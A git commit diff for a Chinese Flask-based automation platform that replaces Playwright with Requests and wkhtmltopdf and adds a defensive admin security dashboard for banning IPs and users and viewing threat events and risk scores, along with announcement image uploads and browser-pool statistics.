Compare commits

...

1 Commits

Author SHA1 Message Date
Yu Yon
53c78e8e3c feat: 添加安全模块 + Dockerfile添加curl支持健康检查
主要更新:
- 新增 security/ 安全模块 (风险评估、威胁检测、蜜罐等)
- Dockerfile 添加 curl 以支持 Docker 健康检查
- 前端页面更新 (管理后台、用户端)
- 数据库迁移和 schema 更新
- 新增 kdocs 上传服务
- 添加安全相关测试用例

Co-Authored-By: Claude <noreply@anthropic.com>
2026-01-08 17:48:33 +08:00
76 changed files with 8563 additions and 4709 deletions

View File

@@ -1,14 +1,18 @@
# 使用国内镜像源加速
FROM mcr.microsoft.com/playwright/python:v1.40.0-jammy
FROM python:3.10-slim-bullseye
# 设置工作目录
WORKDIR /app
# 设置环境变量
ENV PYTHONUNBUFFERED=1
ENV PLAYWRIGHT_BROWSERS_PATH=/ms-playwright
ENV TZ=Asia/Shanghai
# 安装 wkhtmltopdf包含 wkhtmltoimage与中文字体
RUN apt-get update && \
apt-get install -y --no-install-recommends wkhtmltopdf curl fonts-noto-cjk && \
rm -rf /var/lib/apt/lists/*
# 配置 pip 使用国内镜像源
RUN pip config set global.index-url https://mirrors.aliyun.com/pypi/simple/ && pip config set install.trusted-host mirrors.aliyun.com
@@ -18,14 +22,15 @@ COPY requirements.txt .
# 安装Python依赖
RUN pip install --no-cache-dir -r requirements.txt
# 安装 Playwright 浏览器依赖与 Chromium
RUN python -m playwright install --with-deps chromium
# 复制应用程序文件
COPY app.py .
COPY database.py .
COPY db_pool.py .
COPY playwright_automation.py .
COPY api_browser.py .
COPY browser_pool_worker.py .
COPY browser_installer.py .
COPY password_utils.py .
COPY crypto_utils.py .
COPY task_checkpoint.py .
@@ -39,6 +44,7 @@ COPY routes/ ./routes/
COPY services/ ./services/
COPY realtime/ ./realtime/
COPY db/ ./db/
COPY security/ ./security/
COPY templates/ ./templates/
COPY static/ ./static/

View File

@@ -6,10 +6,10 @@
## 项目简介
本项目是一个 **Docker 容器化应用**,使用 Flask + Playwright + SQLite 构建,提供:
本项目是一个 **Docker 容器化应用**,使用 Flask + Requests + wkhtmltopdf + SQLite 构建,提供:
- 多用户注册登录系统
- 浏览器自动化任务
- 自动化任务HTTP 模拟)
- 定时任务调度
- 截图管理
- VIP用户管理
@@ -22,7 +22,8 @@
- **后端**: Python 3.8+, Flask
- **数据库**: SQLite
- **自动化**: Playwright (Chromium)
- **自动化**: Requests + BeautifulSoup
- **截图**: wkhtmltopdf / wkhtmltoimage
- **容器化**: Docker + Docker Compose
- **前端**: HTML + JavaScript + Socket.IO
@@ -39,10 +40,8 @@ zsglpt/
├── database.py # 数据库稳定门面(对外 API
├── db/ # DB 分域实现 + schema/migrations
├── db_pool.py # 数据库连接池
├── playwright_automation.py # Playwright 自动化
├── api_browser.py # Requests 自动化(主浏览流程)
├── browser_pool_worker.py # 截图 WorkerPool(浏览器复用)
├── browser_installer.py # 浏览器安装检查
├── browser_pool_worker.py # 截图 WorkerPool
├── app_config.py # 配置管理
├── app_logger.py # 日志系统
├── app_security.py # 安全模块
@@ -122,8 +121,8 @@ cd /www/wwwroot/zsgpt2
### 步骤4: 创建必要的目录
```bash
mkdir -p data logs 截图 playwright
chmod 777 data logs 截图 playwright
mkdir -p data logs 截图
chmod 777 data logs 截图
```
### 步骤5: 构建并启动Docker容器
@@ -447,19 +446,19 @@ docker-compose down
docker-compose up -d
```
### 5. 浏览器下载失败
### 5. 截图工具未安装
**问题**: Playwright浏览器下载失败
**问题**: wkhtmltoimage 命令不存在
**解决方案**:
```bash
# 进入容器手动安装
docker exec -it knowledge-automation-multiuser bash
playwright install chromium
apt-get update
apt-get install -y wkhtmltopdf
# 或使用国内镜像
export PLAYWRIGHT_DOWNLOAD_HOST=https://npmmirror.com/mirrors/playwright/
playwright install chromium
# 验证安装
wkhtmltoimage --version
```
---
@@ -631,7 +630,19 @@ docker logs knowledge-automation-multiuser | grep "数据库"
|--------|------|--------|
| TZ | 时区 | Asia/Shanghai |
| PYTHONUNBUFFERED | Python输出缓冲 | 1 |
| PLAYWRIGHT_BROWSERS_PATH | 浏览器路径 | /ms-playwright |
| WKHTMLTOIMAGE_PATH | wkhtmltoimage 可执行文件路径 | 自动探测 |
| WKHTMLTOIMAGE_JS_DELAY_MS | JS 等待时间(毫秒) | 3000 |
| WKHTMLTOIMAGE_WIDTH | 截图宽度 | 1920 |
| WKHTMLTOIMAGE_HEIGHT | 截图高度(视口高度) | 1080 |
| WKHTMLTOIMAGE_FULL_PAGE | 是否输出全页截图(忽略视口高度/裁剪) | 0 |
| WKHTMLTOIMAGE_ZOOM | 渲染缩放比例 | 1.0 |
| WKHTMLTOIMAGE_CROP_WIDTH | 裁剪宽度0 表示不裁剪) | 默认跟随截图宽度 |
| WKHTMLTOIMAGE_CROP_HEIGHT | 裁剪高度0 表示不裁剪) | 默认跟随截图高度 |
| WKHTMLTOIMAGE_CROP_X | 裁剪起点 X | 0 |
| WKHTMLTOIMAGE_CROP_Y | 裁剪起点 Y | 0 |
| WKHTMLTOIMAGE_QUALITY | JPG截图质量 | 95 |
| WKHTMLTOIMAGE_TIMEOUT_SECONDS | 截图超时时间(秒) | 60 |
| WKHTMLTOIMAGE_USER_AGENT | 截图使用的 UA | Chrome 120 |
---
@@ -641,13 +652,13 @@ docker logs knowledge-automation-multiuser | grep "数据库"
- **项目名称**: 知识管理平台自动化工具
- **版本**: Docker 多用户版
- **技术栈**: Python + Flask + Playwright + SQLite + Docker
- **技术栈**: Python + Flask + Requests + wkhtmltopdf + SQLite + Docker
### 常用文档链接
- [Docker 官方文档](https://docs.docker.com/)
- [Flask 官方文档](https://flask.palletsprojects.com/)
- [Playwright 官方文档](https://playwright.dev/python/)
- [wkhtmltopdf 官方文档](https://wkhtmltopdf.org/)
### 故障排查
@@ -683,8 +694,8 @@ ssh root@your-ip
# 3. 进入目录并创建必要目录
cd /www/wwwroot/zsgpt2
mkdir -p data logs 截图 playwright
chmod 777 data logs 截图 playwright
mkdir -p data logs 截图
chmod 777 data logs 截图
# 4. 启动容器
docker-compose up -d

View File

@@ -10,6 +10,13 @@ export async function createAnnouncement(payload) {
return data
}
export async function uploadAnnouncementImage(file) {
const formData = new FormData()
formData.append('file', file)
const { data } = await api.post('/announcements/upload_image', formData)
return data
}
export async function activateAnnouncement(id) {
const { data } = await api.post(`/announcements/${id}/activate`)
return data
@@ -24,4 +31,3 @@ export async function deleteAnnouncement(id) {
const { data } = await api.delete(`/announcements/${id}`)
return data
}

View File

@@ -0,0 +1,7 @@
import { api } from './client'
export async function fetchBrowserPoolStats() {
const { data } = await api.get('/browser_pool/stats')
return data
}

View File

@@ -0,0 +1,17 @@
import { api } from './client'
export async function fetchKdocsStatus(params = {}) {
const { data } = await api.get('/kdocs/status', { params })
return data
}
export async function fetchKdocsQr(payload = {}) {
const body = { force: true, ...payload }
const { data } = await api.post('/kdocs/qr', body)
return data
}
export async function clearKdocsLogin() {
const { data } = await api.post('/kdocs/clear-login', {})
return data
}

View File

@@ -0,0 +1,63 @@
import { api } from './client'
export async function getDashboard() {
const { data } = await api.get('/admin/security/dashboard')
return data
}
export async function getThreats(params) {
const { data } = await api.get('/admin/security/threats', { params })
return data
}
export async function getBannedIps() {
const { data } = await api.get('/admin/security/banned-ips')
return data
}
export async function getBannedUsers() {
const { data } = await api.get('/admin/security/banned-users')
return data
}
export async function banIp(payload) {
const { data } = await api.post('/admin/security/ban-ip', payload)
return data
}
export async function unbanIp(ip) {
const { data } = await api.post('/admin/security/unban-ip', { ip })
return data
}
export async function banUser(payload) {
const { data } = await api.post('/admin/security/ban-user', payload)
return data
}
export async function unbanUser(userId) {
const { data } = await api.post('/admin/security/unban-user', { user_id: userId })
return data
}
export async function getIpRisk(ip) {
const safeIp = encodeURIComponent(String(ip || '').trim())
const { data } = await api.get(`/admin/security/ip-risk/${safeIp}`)
return data
}
export async function clearIpRisk(ip) {
const { data } = await api.post('/admin/security/ip-risk/clear', { ip })
return data
}
export async function getUserRisk(userId) {
const safeUserId = encodeURIComponent(String(userId || '').trim())
const { data } = await api.get(`/admin/security/user-risk/${safeUserId}`)
return data
}
export async function cleanup() {
const { data } = await api.post('/admin/security/cleanup', {})
return data
}

View File

@@ -7,6 +7,7 @@ import {
ChatLineSquare,
Document,
List,
Lock,
Message,
Setting,
Tools,
@@ -15,7 +16,6 @@ import {
import { api } from '../api/client'
import { fetchFeedbackStats } from '../api/feedbacks'
import { fetchPasswordResets } from '../api/passwordResets'
import { fetchSystemStats } from '../api/stats'
const route = useRoute()
@@ -33,15 +33,11 @@ async function refreshStats() {
}
const loadingBadges = ref(false)
const pendingResetsCount = ref(0)
const pendingFeedbackCount = ref(0)
let badgeTimer
async function refreshNavBadges(partial = null) {
if (partial && typeof partial === 'object') {
if (Object.prototype.hasOwnProperty.call(partial, 'pendingResets')) {
pendingResetsCount.value = Number(partial.pendingResets || 0)
}
if (Object.prototype.hasOwnProperty.call(partial, 'pendingFeedbacks')) {
pendingFeedbackCount.value = Number(partial.pendingFeedbacks || 0)
}
@@ -52,18 +48,8 @@ async function refreshNavBadges(partial = null) {
loadingBadges.value = true
try {
const [resetsResult, feedbackResult] = await Promise.allSettled([
fetchPasswordResets(),
fetchFeedbackStats(),
])
if (resetsResult.status === 'fulfilled') {
pendingResetsCount.value = Array.isArray(resetsResult.value) ? resetsResult.value.length : 0
}
if (feedbackResult.status === 'fulfilled') {
pendingFeedbackCount.value = Number(feedbackResult.value?.pending || 0)
}
const feedbackResult = await fetchFeedbackStats()
pendingFeedbackCount.value = Number(feedbackResult?.pending || 0)
} finally {
loadingBadges.value = false
}
@@ -99,11 +85,12 @@ onBeforeUnmount(() => {
const menuItems = [
{ path: '/reports', label: '报表', icon: Document },
{ path: '/users', label: '用户', icon: User, badgeKey: 'resets' },
{ path: '/users', label: '用户', icon: User },
{ path: '/feedbacks', label: '反馈', icon: ChatLineSquare, badgeKey: 'feedbacks' },
{ path: '/logs', label: '任务日志', icon: List },
{ path: '/announcements', label: '公告', icon: Bell },
{ path: '/email', label: '邮件', icon: Message },
{ path: '/security', label: '安全防护', icon: Lock },
{ path: '/system', label: '系统配置', icon: Tools },
{ path: '/settings', label: '设置', icon: Setting },
]
@@ -112,7 +99,6 @@ const activeMenu = computed(() => route.path)
function badgeFor(item) {
if (!item?.badgeKey) return 0
if (item.badgeKey === 'resets') return Number(pendingResetsCount.value || 0)
if (item.badgeKey === 'feedbacks') {
return Number(pendingFeedbackCount.value || 0)
}

View File

@@ -1,6 +1,7 @@
<script setup>
import { onMounted, ref } from 'vue'
import { h, onMounted, ref } from 'vue'
import { ElMessage, ElMessageBox } from 'element-plus'
import { Plus } from '@element-plus/icons-vue'
import {
activateAnnouncement,
@@ -8,10 +9,14 @@ import {
deactivateAnnouncement,
deleteAnnouncement,
fetchAnnouncements,
uploadAnnouncementImage,
} from '../api/announcements'
const formTitle = ref('')
const formContent = ref('')
const formImageUrl = ref('')
const imageInputRef = ref(null)
const uploading = ref(false)
const loading = ref(false)
const list = ref([])
@@ -30,18 +35,56 @@ async function load() {
function clearForm() {
formTitle.value = ''
formContent.value = ''
formImageUrl.value = ''
if (imageInputRef.value) imageInputRef.value.value = ''
}
function openImagePicker() {
imageInputRef.value?.click()
}
function clearImage() {
formImageUrl.value = ''
if (imageInputRef.value) imageInputRef.value.value = ''
}
async function onImageFileChange(event) {
const file = event.target?.files?.[0]
if (!file) return
if (file.type && !file.type.startsWith('image/')) {
ElMessage.error('请选择图片文件')
event.target.value = ''
return
}
uploading.value = true
try {
const res = await uploadAnnouncementImage(file)
if (!res?.success || !res?.url) {
ElMessage.error(res?.error || '上传失败')
return
}
formImageUrl.value = res.url
ElMessage.success('上传成功')
} catch {
// handled by interceptor
} finally {
uploading.value = false
event.target.value = ''
}
}
async function submit(isActive) {
const title = formTitle.value.trim()
const content = formContent.value.trim()
const image_url = formImageUrl.value.trim()
if (!title || !content) {
ElMessage.error('标题和内容不能为空')
return
}
try {
const res = await createAnnouncement({ title, content, is_active: Boolean(isActive) })
const res = await createAnnouncement({ title, content, image_url, is_active: Boolean(isActive) })
if (!res?.success) {
ElMessage.error(res?.error || '保存失败')
return
@@ -55,7 +98,17 @@ async function submit(isActive) {
}
async function view(row) {
await ElMessageBox.alert(row.content || '', row.title || '公告', {
const body = h('div', { class: 'announcement-view' }, [
row.content ? h('div', { class: 'announcement-view-text' }, row.content) : null,
row.image_url
? h('img', {
class: 'announcement-view-image',
src: row.image_url,
alt: '公告图片',
})
: null,
])
await ElMessageBox.alert(body, row.title || '公告', {
confirmButtonText: '关闭',
dangerouslyUseHTMLString: false,
})
@@ -162,8 +215,26 @@ onMounted(load)
show-word-limit
/>
</el-form-item>
<el-form-item label="公告图片">
<div class="image-upload-row">
<el-button :icon="Plus" :loading="uploading" @click="openImagePicker">上传图片</el-button>
<el-button v-if="formImageUrl" @click="clearImage">移除</el-button>
<span v-if="formImageUrl" class="image-url">{{ formImageUrl }}</span>
<input
ref="imageInputRef"
class="image-input"
type="file"
accept="image/*"
@change="onImageFileChange"
/>
</div>
</el-form-item>
</el-form>
<div v-if="formImageUrl" class="image-preview">
<img :src="formImageUrl" alt="公告图片预览" />
</div>
<div class="actions">
<el-button type="primary" @click="submit(true)">发布并启用</el-button>
<el-button @click="submit(false)">保存但不启用</el-button>
@@ -193,6 +264,12 @@ onMounted(load)
</el-tag>
</template>
</el-table-column>
<el-table-column label="图片" width="100">
<template #default="{ row }">
<el-tag v-if="row.image_url" type="success" effect="light">有图</el-tag>
<span v-else class="app-muted">-</span>
</template>
</el-table-column>
<el-table-column prop="created_at" label="创建时间" width="180" />
<el-table-column label="操作" width="260" fixed="right">
<template #default="{ row }">
@@ -234,6 +311,57 @@ onMounted(load)
color: var(--app-muted);
}
.image-preview {
margin: 6px 0 2px;
display: flex;
justify-content: flex-start;
}
.image-preview img {
max-width: 280px;
max-height: 160px;
border-radius: 8px;
border: 1px solid var(--app-border);
object-fit: contain;
}
.image-upload-row {
display: flex;
align-items: center;
gap: 10px;
flex-wrap: wrap;
}
.image-input {
display: none;
}
.image-url {
font-size: 12px;
color: var(--app-muted);
word-break: break-all;
}
.announcement-view {
display: flex;
flex-direction: column;
gap: 12px;
}
.announcement-view-text {
white-space: pre-wrap;
line-height: 1.6;
font-size: 14px;
}
.announcement-view-image {
max-width: 100%;
max-height: 320px;
border-radius: 10px;
border: 1px solid var(--app-border);
object-fit: contain;
}
.table-wrap {
overflow-x: auto;
}
@@ -252,4 +380,3 @@ onMounted(load)
gap: 8px;
}
</style>

View File

@@ -21,6 +21,7 @@ const settings = reactive({
enabled: false,
failover_enabled: true,
register_verify_enabled: false,
login_alert_enabled: true,
task_notify_enabled: false,
base_url: '',
updated_at: null,
@@ -35,6 +36,7 @@ async function loadEmailSettings() {
settings.enabled = Boolean(data.enabled)
settings.failover_enabled = Boolean(data.failover_enabled)
settings.register_verify_enabled = Boolean(data.register_verify_enabled)
settings.login_alert_enabled = data.login_alert_enabled === undefined ? true : Boolean(data.login_alert_enabled)
settings.task_notify_enabled = Boolean(data.task_notify_enabled)
settings.base_url = data.base_url || ''
settings.updated_at = data.updated_at || null
@@ -53,6 +55,7 @@ async function saveEmailSettings() {
enabled: settings.enabled,
failover_enabled: settings.failover_enabled,
register_verify_enabled: settings.register_verify_enabled,
login_alert_enabled: settings.login_alert_enabled,
task_notify_enabled: settings.task_notify_enabled,
base_url: (settings.base_url || '').trim(),
})
@@ -597,6 +600,8 @@ onMounted(refreshAll)
@change="scheduleSaveEmailSettings"
/>
</el-form-item>
<el-divider content-position="left">通知设置</el-divider>
<el-form-item label="启用任务完成通知">
<el-switch
v-model="settings.task_notify_enabled"
@@ -604,6 +609,14 @@ onMounted(refreshAll)
@change="scheduleSaveEmailSettings"
/>
</el-form-item>
<el-form-item label="新设备登录提醒">
<el-switch
v-model="settings.login_alert_enabled"
:disabled="emailSettingsSaving"
@change="scheduleSaveEmailSettings"
/>
<div class="help">当检测到新设备或新IP登录时发送邮件提醒用户</div>
</el-form-item>
<el-form-item label="网站基础URL">
<el-input
v-model="settings.base_url"

View File

@@ -1,12 +1,11 @@
<script setup>
import { computed, inject, onMounted, ref } from 'vue'
import { computed, inject, onMounted, onUnmounted, ref } from 'vue'
import {
Calendar,
ChatLineSquare,
Clock,
Cpu,
Key,
Lock,
Loading,
Message,
Star,
@@ -18,16 +17,15 @@ import {
import { fetchFeedbackStats } from '../api/feedbacks'
import { fetchEmailStats } from '../api/email'
import { fetchPasswordResets } from '../api/passwordResets'
import { fetchDockerStats, fetchRunningTasks, fetchServerInfo, fetchTaskStats } from '../api/tasks'
import { fetchBrowserPoolStats } from '../api/browser_pool'
import { fetchSystemConfig } from '../api/system'
import { fetchUpdateResult, fetchUpdateStatus } from '../api/update'
const refreshStats = inject('refreshStats', null)
const adminStats = inject('adminStats', null)
const refreshNavBadges = inject('refreshNavBadges', null)
const loading = ref(false)
const refreshing = ref(false)
const lastUpdatedAt = ref('')
const taskStats = ref(null)
@@ -36,11 +34,8 @@ const emailStats = ref(null)
const feedbackStats = ref(null)
const serverInfo = ref(null)
const dockerStats = ref(null)
const browserPoolStats = ref(null)
const systemConfig = ref(null)
const updateStatus = ref(null)
const updateStatusError = ref('')
const updateResult = ref(null)
const passwordResetsCount = ref(0)
const queueTab = ref('running')
function recordUpdatedAt() {
@@ -67,12 +62,6 @@ function parsePercent(value) {
return n
}
function shortCommit(value) {
const text = String(value ?? '').trim()
if (!text) return '-'
return text.length > 12 ? `${text.slice(0, 12)}` : text
}
function sourceLabel(source) {
const raw = String(source ?? '').trim()
if (!raw) return '手动'
@@ -101,7 +90,6 @@ const overviewCards = computed(() => {
sub: liveMax ? `并发上限 ${liveMax}` : '',
},
{ label: '排队任务', value: normalizeCount(runningTasks.value?.queuing_count), icon: Clock, tone: 'purple' },
{ label: '密码重置待处理', value: normalizeCount(passwordResetsCount.value), icon: Lock, tone: 'red' },
]
})
@@ -112,6 +100,40 @@ const queuingTaskList = computed(() => runningTasks.value?.queuing || [])
const runningCount = computed(() => normalizeCount(runningTasks.value?.running_count))
const queuingCount = computed(() => normalizeCount(runningTasks.value?.queuing_count))
const browserPoolWorkers = computed(() => {
const workers = browserPoolStats.value?.workers
if (!Array.isArray(workers)) return []
return [...workers].sort((a, b) => normalizeCount(a?.worker_id) - normalizeCount(b?.worker_id))
})
const browserPoolTotalWorkers = computed(() => normalizeCount(browserPoolStats.value?.total_workers))
const browserPoolActiveWorkers = computed(() => browserPoolWorkers.value.filter((w) => Boolean(w?.has_browser)).length)
const browserPoolIdleWorkers = computed(() => normalizeCount(browserPoolStats.value?.idle_workers))
const browserPoolQueueSize = computed(() => normalizeCount(browserPoolStats.value?.queue_size))
const browserPoolBusyWorkers = computed(() => normalizeCount(browserPoolStats.value?.active_workers))
function workerPoolStatusType(worker) {
if (!worker?.thread_alive) return 'danger'
if (worker?.has_browser) return 'success'
return 'info'
}
function workerPoolStatusLabel(worker) {
if (!worker?.thread_alive) return '异常'
if (worker?.has_browser) return '活跃'
return '空闲'
}
function workerRunTagType(worker) {
if (!worker?.thread_alive) return 'danger'
return worker?.idle ? 'info' : 'warning'
}
function workerRunLabel(worker) {
if (!worker?.thread_alive) return '停止'
return worker?.idle ? '空闲' : '忙碌'
}
const taskTodaySuccessRate = computed(() => {
const success = normalizeCount(taskToday.value.success_tasks)
const failed = normalizeCount(taskToday.value.failed_tasks)
@@ -160,71 +182,70 @@ const runningCountsLabel = computed(() => {
return `运行中 ${runningCount} / 排队 ${queuingCount} / 并发上限 ${maxGlobal || maxConcurrentGlobal.value || '-'}`
})
const updateAvailable = computed(() => Boolean(updateStatus.value?.update_available))
const updateRunning = computed(() => updateResult.value?.status === 'running')
async function refreshAll() {
if (loading.value) return
async function refreshAll(options = {}) {
const showLoading = options.showLoading ?? true
if (refreshing.value) return
refreshing.value = true
if (showLoading) {
loading.value = true
}
try {
const [
taskResult,
runningResult,
emailResult,
feedbackResult,
resetsResult,
serverResult,
dockerResult,
browserPoolResult,
configResult,
updateStatusResult,
updateResultResult,
] = await Promise.allSettled([
fetchTaskStats(),
fetchRunningTasks(),
fetchEmailStats(),
fetchFeedbackStats(),
fetchPasswordResets(),
fetchServerInfo(),
fetchDockerStats(),
fetchBrowserPoolStats(),
fetchSystemConfig(),
fetchUpdateStatus(),
fetchUpdateResult(),
])
taskStats.value = taskResult.status === 'fulfilled' ? taskResult.value : null
runningTasks.value = runningResult.status === 'fulfilled' ? runningResult.value : null
emailStats.value = emailResult.status === 'fulfilled' ? emailResult.value : null
feedbackStats.value = feedbackResult.status === 'fulfilled' ? feedbackResult.value : null
passwordResetsCount.value = resetsResult.status === 'fulfilled' ? (Array.isArray(resetsResult.value) ? resetsResult.value.length : 0) : 0
serverInfo.value = serverResult.status === 'fulfilled' ? serverResult.value : null
dockerStats.value = dockerResult.status === 'fulfilled' ? dockerResult.value : null
browserPoolStats.value = browserPoolResult.status === 'fulfilled' ? browserPoolResult.value : null
systemConfig.value = configResult.status === 'fulfilled' ? configResult.value : null
if (updateStatusResult.status === 'fulfilled') {
const res = updateStatusResult.value
if (res?.ok) {
updateStatus.value = res.data || null
updateStatusError.value = ''
} else {
updateStatus.value = null
updateStatusError.value = res?.error || '未发现更新状态Update-Agent 可能未运行)'
}
} else {
updateStatus.value = null
updateStatusError.value = ''
}
updateResult.value = updateResultResult.status === 'fulfilled' && updateResultResult.value?.ok ? updateResultResult.value.data : null
await refreshNavBadges?.({ pendingResets: passwordResetsCount.value })
await refreshStats?.()
recordUpdatedAt()
} finally {
refreshing.value = false
if (showLoading) {
loading.value = false
}
}
}
onMounted(refreshAll)
let refreshTimer = null
function manualRefresh() {
return refreshAll({ showLoading: true })
}
onMounted(() => {
refreshAll({ showLoading: false })
refreshTimer = setInterval(() => refreshAll({ showLoading: false }), 1000)
})
onUnmounted(() => {
if (refreshTimer) {
clearInterval(refreshTimer)
refreshTimer = null
}
})
</script>
<template>
@@ -234,10 +255,6 @@ onMounted(refreshAll)
<div class="hero-title">
<div class="hero-title-row">
<h2>报表中心</h2>
<el-tag v-if="updateStatusError" type="info" effect="dark">更新状态未知</el-tag>
<el-tag v-else-if="updateAvailable" type="warning" effect="dark">新版本可更新</el-tag>
<el-tag v-else type="success" effect="dark">已是最新</el-tag>
<el-tag v-if="updateRunning" type="warning" effect="plain">更新中</el-tag>
</div>
<div class="hero-meta app-muted">
<span v-if="lastUpdatedAt">更新时间{{ lastUpdatedAt }}</span>
@@ -247,7 +264,7 @@ onMounted(refreshAll)
</div>
<div class="hero-actions">
<el-button type="primary" plain :loading="loading" @click="refreshAll">刷新</el-button>
<el-button type="primary" plain :loading="loading" @click="manualRefresh">刷新</el-button>
</div>
</div>
@@ -582,6 +599,67 @@ onMounted(refreshAll)
<el-descriptions-item label="内存">{{ dockerStats?.memory_usage || '-' }}</el-descriptions-item>
<el-descriptions-item label="内存占比">{{ dockerStats?.memory_percent || '-' }}</el-descriptions-item>
</el-descriptions>
<div class="divider"></div>
<div class="panel-head">
<div class="head-left">
<div class="head-text">
<div class="panel-title">截图线程池</div>
<div class="panel-sub app-muted">
活跃有执行环境{{ browserPoolActiveWorkers }} · 忙碌 {{ browserPoolBusyWorkers }} · 队列 {{ browserPoolQueueSize }}
</div>
</div>
</div>
<el-tag v-if="browserPoolStats?.server_time_cst" effect="light" type="info">{{ browserPoolStats.server_time_cst }}</el-tag>
</div>
<div class="tile-grid tile-grid--4">
<div class="tile">
<div class="tile-v">{{ browserPoolTotalWorkers }}</div>
<div class="tile-k app-muted"> Worker</div>
</div>
<div class="tile">
<div class="tile-v ok">{{ browserPoolActiveWorkers }}</div>
<div class="tile-k app-muted">活跃有执行环境</div>
</div>
<div class="tile">
<div class="tile-v">{{ browserPoolIdleWorkers }}</div>
<div class="tile-k app-muted">空闲无任务</div>
</div>
<div class="tile">
<div class="tile-v warn">{{ browserPoolQueueSize }}</div>
<div class="tile-k app-muted">队列等待</div>
</div>
</div>
<div class="divider"></div>
<div class="table-wrap">
<el-table :data="browserPoolWorkers" size="small" border>
<el-table-column prop="worker_id" label="Worker" width="90" />
<el-table-column label="状态" width="90">
<template #default="{ row }">
<el-tag :type="workerPoolStatusType(row)" effect="light">{{ workerPoolStatusLabel(row) }}</el-tag>
</template>
</el-table-column>
<el-table-column label="执行" width="90">
<template #default="{ row }">
<el-tag :type="workerRunTagType(row)" effect="light">{{ workerRunLabel(row) }}</el-tag>
</template>
</el-table-column>
<el-table-column label="任务" width="120">
<template #default="{ row }">
<span>{{ normalizeCount(row?.total_tasks) }}</span>
<span class="app-muted"> / </span>
<span :class="normalizeCount(row?.failed_tasks) ? 'err' : 'app-muted'">{{ normalizeCount(row?.failed_tasks) }}</span>
</template>
</el-table-column>
<el-table-column prop="browser_use_count" label="复用" width="90" />
<el-table-column prop="last_active_at" label="最近活跃" min-width="160" />
<el-table-column prop="browser_created_at" label="环境创建" min-width="160" />
</el-table>
</div>
</el-card>
</el-col>
@@ -593,21 +671,12 @@ onMounted(refreshAll)
<el-icon><Tools /></el-icon>
</div>
<div class="head-text">
<div class="panel-title">配置与更新</div>
<div class="panel-sub app-muted">定时/代理/并发与版本</div>
<div class="panel-title">配置概览</div>
<div class="panel-sub app-muted">定时 / 代理 / 并发</div>
</div>
</div>
<el-tag v-if="updateAvailable" effect="dark" type="warning">可更新</el-tag>
</div>
<el-alert
v-if="updateStatusError"
type="info"
:closable="false"
:title="updateStatusError"
style="margin-bottom: 12px"
/>
<div class="config-grid">
<div class="config-item">
<div class="config-k app-muted">定时任务</div>
@@ -640,18 +709,6 @@ onMounted(refreshAll)
</div>
</div>
</div>
<div class="divider"></div>
<div class="sub-title">版本信息</div>
<el-descriptions border :column="1" size="small">
<el-descriptions-item label="本地版本(commit)">{{ shortCommit(updateStatus?.local_commit) }}</el-descriptions-item>
<el-descriptions-item label="远端版本(commit)">{{ shortCommit(updateStatus?.remote_commit) }}</el-descriptions-item>
<el-descriptions-item label="最近检查时间">{{ updateStatus?.checked_at || '-' }}</el-descriptions-item>
<el-descriptions-item v-if="updateResult?.job_id" label="最近更新">
<span>job {{ updateResult.job_id }} / {{ updateResult?.status || '-' }}</span>
</el-descriptions-item>
</el-descriptions>
</el-card>
</el-col>
</el-row>
@@ -956,6 +1013,10 @@ onMounted(refreshAll)
grid-template-columns: repeat(3, minmax(0, 1fr));
}
.tile-grid--4 {
grid-template-columns: repeat(4, minmax(0, 1fr));
}
.tile {
border: 1px solid rgba(17, 24, 39, 0.08);
border-radius: 16px;
@@ -1127,6 +1188,10 @@ onMounted(refreshAll)
grid-template-columns: repeat(2, minmax(0, 1fr));
}
.tile-grid--4 {
grid-template-columns: repeat(2, minmax(0, 1fr));
}
.resource-grid {
grid-template-columns: 1fr;
}

View File

@@ -0,0 +1,843 @@
<script setup>
import { computed, onMounted, ref } from 'vue'
import { ElMessage, ElMessageBox } from 'element-plus'
import {
banIp,
banUser,
cleanup,
clearIpRisk,
getBannedIps,
getBannedUsers,
getDashboard,
getIpRisk,
getThreats,
getUserRisk,
unbanIp,
unbanUser,
} from '../api/security'
const pageSize = 20
const activeTab = ref('threats')
const dashboardLoading = ref(false)
const dashboard = ref(null)
const threatsLoading = ref(false)
const threatItems = ref([])
const threatTotal = ref(0)
const threatPage = ref(1)
const threatTypeFilter = ref('')
const threatSeverityFilter = ref('')
const bansLoading = ref(false)
const bannedIps = ref([])
const bannedUsers = ref([])
const banTab = ref('ips')
const banDialogOpen = ref(false)
const banSubmitting = ref(false)
const banForm = ref({
kind: 'ip',
ip: '',
user_id: '',
reason: '',
duration_hours: 24,
permanent: false,
})
const riskTab = ref('ip')
const riskLoading = ref(false)
const riskIpInput = ref('')
const riskUserIdInput = ref('')
const riskResult = ref(null)
const riskResultKind = ref('')
const commonThreatTypes = [
'sql_injection',
'xss',
'path_traversal',
'command_injection',
'ssrf',
'scanner',
'bruteforce',
'csrf',
'xxe',
'file_upload',
]
function normalizeCount(value) {
const n = Number(value)
return Number.isFinite(n) ? n : 0
}
function scoreMeta(score) {
const n = Number(score || 0)
if (n >= 80) return { label: '高', type: 'danger' }
if (n >= 50) return { label: '中', type: 'warning' }
return { label: '低', type: 'success' }
}
function formatExpires(expiresAt) {
const text = String(expiresAt || '').trim()
return text ? text : '永久'
}
function payloadTooltip(row) {
const parts = []
if (row?.field_name) parts.push(`字段: ${row.field_name}`)
if (row?.rule) parts.push(`规则: ${row.rule}`)
if (row?.matched) parts.push(`匹配: ${row.matched}`)
if (row?.value_preview) parts.push(`值: ${row.value_preview}`)
return parts.length ? parts.join(' · ') : '-'
}
function pathText(row) {
const method = String(row?.request_method || '').trim()
const path = String(row?.request_path || '').trim()
const combined = `${method} ${path}`.trim()
return combined || '-'
}
const threatTypeOptions = computed(() => {
const seen = new Set(commonThreatTypes)
const recent = dashboard.value?.recent_threat_events || []
for (const item of recent) {
const t = String(item?.threat_type || '').trim()
if (t) seen.add(t)
}
for (const item of threatItems.value || []) {
const t = String(item?.threat_type || '').trim()
if (t) seen.add(t)
}
return Array.from(seen)
.sort((a, b) => a.localeCompare(b))
.map((t) => ({ label: t, value: t }))
})
const dashboardCards = computed(() => {
const d = dashboard.value || {}
return [
{ key: 'threat_events_24h', label: '最近24小时威胁事件', value: normalizeCount(d.threat_events_24h) },
{ key: 'banned_ip_count', label: '当前封禁IP数', value: normalizeCount(d.banned_ip_count) },
{ key: 'banned_user_count', label: '当前封禁用户数', value: normalizeCount(d.banned_user_count) },
]
})
const threatTotalPages = computed(() => Math.max(1, Math.ceil((threatTotal.value || 0) / pageSize)))
async function loadDashboard() {
dashboardLoading.value = true
try {
dashboard.value = await getDashboard()
} catch {
dashboard.value = null
} finally {
